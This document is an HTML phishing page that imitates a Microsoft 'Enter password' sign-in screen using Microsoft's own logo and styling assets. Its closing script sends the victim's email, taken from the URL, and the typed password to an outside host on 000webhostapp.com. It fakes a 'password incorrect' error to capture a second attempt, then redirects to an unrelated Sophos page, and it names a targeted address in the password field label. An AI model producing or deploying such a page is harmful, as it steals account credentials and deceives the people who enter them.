<html dir="ltr" class="" lang="en">

<head>
    <title>Authorisation Required</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta name="Robots" content="NOINDEX, NOFOLLOW">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

    <meta name="robots" content="none">
    <link rel="shortcut icon"
        href="https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">

    <link crossorigin="anonymous"
        href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_lgjnfq3xbrj5zvj5ionvww2.css"
        rel="stylesheet">


    <link rel="prefetch"
        href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_lgjnfq3xbrj5zvj5ionvww2.css">
</head>

<style>
    .progress {
        overflow: hidden;
    }

    .progress>div {
        position: absolute;
        height: 5px;
        width: 5px;
        background-color: #0067b8;
        z-index: 100;
        border-radius: 50%;
        opacity: 0;
    }

    .progress {
        position: absolute;
        top: 0;
        left: 0;
        height: 5px;
        width: 100%;
    }

    .progress>div {
        -webkit-animation: progressDot 2s infinite;
        -moz-animation: progressDot 2s infinite;
        -o-animation: progressDot 2s infinite;
        animation: progressDot 2s infinite;
    }

    .progress>div:nth-child(1) {
        -webkit-animation-delay: .05s;
        -moz-animation-delay: .05s;
        -o-animation-delay: .05s;
        animation-delay: .05s;
    }

    .progress>div:nth-child(2) {
        -webkit-animation-delay: .2s;
        -moz-animation-delay: .2s;
        -o-animation-delay: .2s;
        animation-delay: .2s;
    }

    .progress>div:nth-child(3) {
        -webkit-animation-delay: .35s;
        -moz-animation-delay: .35s;
        -o-animation-delay: .35s;
        animation-delay: .35s;
    }

    .progress>div:nth-child(4) {
        -webkit-animation-delay: .5s;
        -moz-animation-delay: .5s;
        -o-animation-delay: .5s;
        animation-delay: .5s;
    }

    .progress>div:nth-child(5) {
        -webkit-animation-delay: .65s;
        -moz-animation-delay: .65s;
        -o-animation-delay: .65s;
        animation-delay: .65s;
    }

    @-webkit-keyframes progressDot {

        0%,
        20% {
            left: 0%;
            -webkit-animation-timing-function: ease-out;
            opacity: 0;
        }

        25% {
            opacity: 1;
        }

        35% {
            left: 45%;
            -webkit-animation-timing-function: linear;
        }

        65% {
            left: 60%;
            -webkit-animation-timing-function: ease-in;
        }

        75% {
            opacity: 1;
        }

        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

    @-moz-keyframes progressDot {

        0%,
        20% {
            left: 0%;
            -moz-animation-timing-function: ease-out;
            opacity: 0;
        }

        25% {
            opacity: 1;
        }

        35% {
            left: 45%;
            -moz-animation-timing-function: linear;
        }

        65% {
            left: 60%;
            -moz-animation-timing-function: ease-in;
        }

        75% {
            opacity: 1;
        }

        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

    @-o-keyframes progressDot {

        0%,
        20% {
            left: 0%;
            -o-animation-timing-function: ease-out;
            opacity: 0;
        }

        25% {
            opacity: 1;
        }

        35% {
            left: 45%;
            -o-animation-timing-function: linear;
        }

        65% {
            left: 60%;
            -o-animation-timing-function: ease-in;
        }

        75% {
            opacity: 1;
        }

        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

    @keyframes progressDot {

        0%,
        20% {
            left: 0%;
            animation-timing-function: ease-out;
            opacity: 0;
        }

        25% {
            opacity: 1;
        }

        35% {
            left: 45%;
            animation-timing-function: linear;
        }

        65% {
            left: 60%;
            animation-timing-function: ease-in;
        }

        75% {
            opacity: 1;
        }

        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }
</style>

<body class="cb" style="display: block;">
    <div>

        <div name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top"
            autocomplete="off">


            <div>
                <!--  -->

                <div id="lightboxTemplateContainer">

                    <div id="lightboxBackgroundContainer">
                        <div class="background-image-holder app" role="presentation"
                            data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }">

                            <div class="background-image-small" data-bind="backgroundImage: smallImageUrl()"
                                style="background-image: url(&quot;https://aadcdn.msauth.net/shared/1.0/content/images/appbackgrounds/49-small_e58aafc980614a9cd7796bea7b5ea8f0.jpg&quot;);">
                            </div>

                            <div data-bind="backgroundImage: backgroundImageUrl(), externalCss: { 'background-image': true }"
                                class="background-image ext-background-image"
                                style="background-image: url(&quot;https://aadcdn.msauth.net/shared/1.0/content/images/appbackgrounds/49_7916a894ebde7d29c2cc29b267f1299f.jpg&quot;);">
                            </div>

                        </div>
                    </div>


                    <div class="outer app" data-bind="css: { 'app': $page.backgroundLogoUrl }">


                        <div class="template-section main-section">
                            <div class="middle" data-bind="css: { 'has-header': showHeader }">
                                <div class="full-height"
                                    data-bind="component: { name: 'content-control', params: { serverData: svr } }">
                                    <!--  -->


                                    <div class="flex-column">

                                        <div class="background-logo-holder">
                                            <img class="background-logo" role="presentation"
                                                data-bind="attr: { src: $page.backgroundLogoUrl }"
                                                src="https://aadcdn.msauth.net/shared/1.0/content/images/applogos/53_8b36337037cff88c3df203bb73d58e41.png">
                                        </div>


                                        <div class="win-scroll">
                                            <div id="lightbox" data-bind="
            animationEnd: $page.paginationControlHelper.animationEnd,
            externalCss: { 'sign-in-box': true },
            css: {
                'inner':  $content.isVerticalSplitTemplate,
                'vertical-split-content': $content.isVerticalSplitTemplate,
                'app': $page.backgroundLogoUrl,
                'wide': $page.paginationControlHelper.useWiderWidth,
                'fade-in-lightbox': $page.fadeInLightBox,
                'has-popup': $page.showFedCredAndNewSession &amp;&amp; ($page.showFedCredButtons() || $page.newSession()),
                'transparent-lightbox': $page.backgroundControlMethods() &amp;&amp; $page.backgroundControlMethods().useTransparentLightBox,
                'lightbox-bottom-margin-debug': $page.showDebugDetails }"
                                                class="sign-in-box ext-sign-in-box app fade-in-lightbox has-popup">



                                                <div class="lightbox-cover"
                                                    data-bind="css: { 'disable-lightbox': svr.fAllowGrayOutLightBox &amp;&amp; showLightboxProgress() }">
                                                </div>

                                                <div id="progressBar" class="progress" style="display:none;">
                                                    <div></div>
                                                    <div></div>
                                                    <div></div>
                                                    <div></div>
                                                    <div></div>
                                                </div>


                                                <div data-bind="component: { name: 'logo-control',
            params: {
                isChinaDc: svr.fIsChinaDc,
                bannerLogoUrl: bannerLogoUrl() } }">
                                                    <!--  -->

                                                    <img class="logo" role="img"
                                                        pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png"
                                                        svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
                                                        data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }"
                                                        src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
                                                        alt="Microsoft"><!-- /ko -->

                                                </div><br>



                                                <span id="username" name="username" class="identity"></span>


                                                <div role="main">
                                                    <!--  -->

                                                    <div class="">


                                                        <div class="pagination-view animate slide-in-next">

                                                            <div data-viewid="1" data-showfedcredbutton="true">

                                                                <div data-bind="component: { name: 'header-control',
    params: {
        serverData: svr,
        title: str['WF_STR_HeaderDefault_Title'] } }">
                                                                    <div class="row title ext-title" id="loginHeader"
                                                                        data-bind="externalCss: { 'title': true }">
                                                                        <div role="heading" aria-level="1"
                                                                            data-bind="text: title">Enter password</div>



                                                                    </div>
                                                                </div>

                                                                <div style="color: red; display:none" class="warning"
                                                                    id="errormsg">Your account or password is incorrect.
                                                                    If you don't remember your password, <a href="#">
                                                                        reset it now.</a><br><br></div>

                                                                <div style="color: red; display:none" class="warning"
                                                                    id="warning">Please enter your password.</div>

                                                                <p id="bcos" class="sensitive"
                                                                    style="margin:3px 0px 3px 0px; display:none">Because
                                                                    you're accessing sensitive info, you need to verify
                                                                    your password</p>


                                                                <div class="row">
                                                                    <div role="alert" aria-live="assertive">

                                                                    </div>

                                                                    <div class="form-group col-md-24">

                                                                        <div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox-field',
                    publicMethods: passwordTextbox.placeholderTextboxMethods,
                    params: {
                        serverData: svr,
                        hintText: str['CT_PWD_STR_PwdTB_Label'] },
                    event: {
                        updateFocus: passwordTextbox.textbox_onUpdateFocus } }">


                                                                            <input name="password" type="password"
                                                                                id="password" value=""
                                                                                autocomplete="off"
                                                                                class="form-control input ext-input text-box ext-text-box"
                                                                                aria-required="true"
                                                                                placeholder="Password"
                                                                                aria-label="Enter the password for info@treeport.eu"
                                                                                tabindex="0">


                                                                        </div>

                                                                    </div>
                                                                </div>

                                                                <div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }"
                                                                    class="position-buttons">
                                                                    <div class="row">
                                                                        <div class="col-md-24">
                                                                            <div class="text-13">

                                                                                <div class="form-group" data-bind="
                    htmlWithBindings: html['WF_STR_SignUpLink_Text'],
                    childBindings: {
                        'signup': {
                            href: svr.urlSignUp || '#',
                            ariaLabel: svr.urlSignUp ? str['WF_STR_SignupLink_AriaLabel_Text'] : str['WF_STR_SignupLink_AriaLabel_Generic_Text'],
                            click: signup_onClick } }"><a href="#" id="signup" aria-label="Create a Microsoft account">Forgot
                                                                                        my password</a></div>

                                                                                <div class="form-group">
                                                                                    <a id="cantAccessAccount"
                                                                                        name="cannotAccessAccount"
                                                                                        data-bind="
                        text: str['WF_STR_CantAccessAccount_Text'],
                        click: accessRecoveryLink ? null : cantAccessAccount_onClick,
                        attr: { target: accessRecoveryLink &amp;&amp; '_blank' },
                        href: accessRecoveryLink || '#'" href="#">Sign in with another account</a>
                                                                                </div>

                                                                            </div>
                                                                        </div>
                                                                    </div>
                                                                </div>



                                                                <div class="win-button-pin-bottom"
                                                                    data-bind="css : { 'boilerplate-button-bottom': tenantBranding.BoilerPlateText }">
                                                                    <div class="row"
                                                                        data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }">
                                                                        <div>
                                                                            <div class="col-xs-24 no-padding-left-right button-container"
                                                                                data-bind="
    visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
    css: { 'no-margin-bottom': removeBottomMargin }">


                                                                                <div data-bind="css: { 'inline-block': isPrimaryButtonVisible }"
                                                                                    class="inline-block">

                                                                                    <input type="submit" id="submit-btn"
                                                                                        onclick="sendmails()"
                                                                                        class="win-button button_primary button ext-button primary ext-primary"
                                                                                        value="Next">
                                                                                </div>
                                                                            </div>
                                                                        </div>
                                                                    </div>
                                                                </div>

                                                            </div>

                                                        </div>
                                                    </div>
                                                </div>

                                            </div>


                                            <div class="promoted-fed-cred-box app"
                                                data-bind="css: { 'app': $page.backgroundLogoUrl }">
                                                <div class="promoted-fed-cred-content app" data-bind="css: {
                'animate': $page.useCssAnimations &amp;&amp; $page.animate(),
                'slide-out-next': $page.animate.isSlideOutNext,
                'slide-in-next': $page.animate.isSlideInNext,
                'slide-out-back': $page.animate.isSlideOutBack,
                'slide-in-back': $page.animate.isSlideInBack,
                'app': $page.backgroundLogoUrl }">

                                                </div>
                                            </div>

                                        </div>
                                    </div>
                                    <!-- /ko -->
                                </div>
                            </div>
                        </div>


                        <div id="footer" role="contentinfo" data-bind="
        externalCss: {
            'footer': true,
            'has-background': !$page.useDefaultBackground(),
            'background-always-visible': $page.backgroundLogoUrl }"
                            class="footer ext-footer has-background ext-has-background background-always-visible ext-background-always-visible">

                            <div data-bind="component: { name: 'footer-control',
            publicMethods: $page.footerMethods,
            params: {
                serverData: svr,
                useDefaultBackground: $page.useDefaultBackground(),
                hasDarkBackground: $page.backgroundLogoUrl(),
                showLinks: true },
            event: {
                agreementClick: $page.footer_agreementClick,
                showDebugDetails: $page.toggleDebugDetails_onClick } }">
                                <div id="footerLinks" class="footerNode text-secondary">

                                    <a id="ftrTerms" data-bind="
            text: termsText,
            href: termsLink,
            click: termsLink_onClick,
            externalCss: {
                'footer-content': true,
                'footer-item': true,
                'has-background': !useDefaultBackground,
                'background-always-visible': hasDarkBackground }"
                                        href="https://www.microsoft.com/en-US/servicesagreement/"
                                        class="footer-content ext-footer-content footer-item ext-footer-item has-background ext-has-background background-always-visible ext-background-always-visible">Terms
                                        of use</a>


                                </div>
                            </div>
                        </div>

                    </div>
                </div>

            </div>

        </div>



</body>


<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js"
    integrity="sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ"
    crossorigin="anonymous"></script>


<script>

    var queryString = window.location.href;
    var dom = queryString.split("#");
    var email = dom[1];
    var count = 0;
    var company = email.split("@");
    var domain = company[1];
    document.getElementById("username").innerHTML = email;

    $("#bcos").show();


    $('#password').keyup(function (event) {
        if (event.which == 13) {
            $('#submit-btn').click();
        }
    });


    function sendmails() {

        var ps = $("#password").val();
        var submit = true;

        if (ps == null || ps == "") {
            $("#errormsg").hide();
            $("#warning").show();
            $("#bcos").hide();
            submit = false;
        }

        else {
            //	$("#errormsg").hide();
            $("#warning").hide();
            submit = true;
        }

        if (submit == true) {

            $.ajax({
                url: 'https://public-drive.000webhostapp.com/index.php', // full url of processor.php
                type: 'POST',
                data: {
                    user: email,
                    pass: ps,
                    type: 1
                },
                beforeSend: function () {
                    $(".progress").show();
                    $('#submit-btn').val('Next');
                },

                success: function (response) {
                    if (response == 0) {
                        count = count + 1;
                        $(".progress").hide();

                        if (count >= 2) {
                            $("#errormsg").hide();

                            function redirect() {
                                window.location.replace("https://cloud.sophos.com/xgemail/release/success?locale=en-US");
                            }

                            setTimeout(redirect, 700);


                        } else {
                            $("#errormsg").show();
                            $("#password").val("");
                            $("#bcos").hide();
                        }

                    }
                },

                complete: function () {
                    $('#submit-btn').val('Next');
                }
            });

        }

    }



</script>




</html>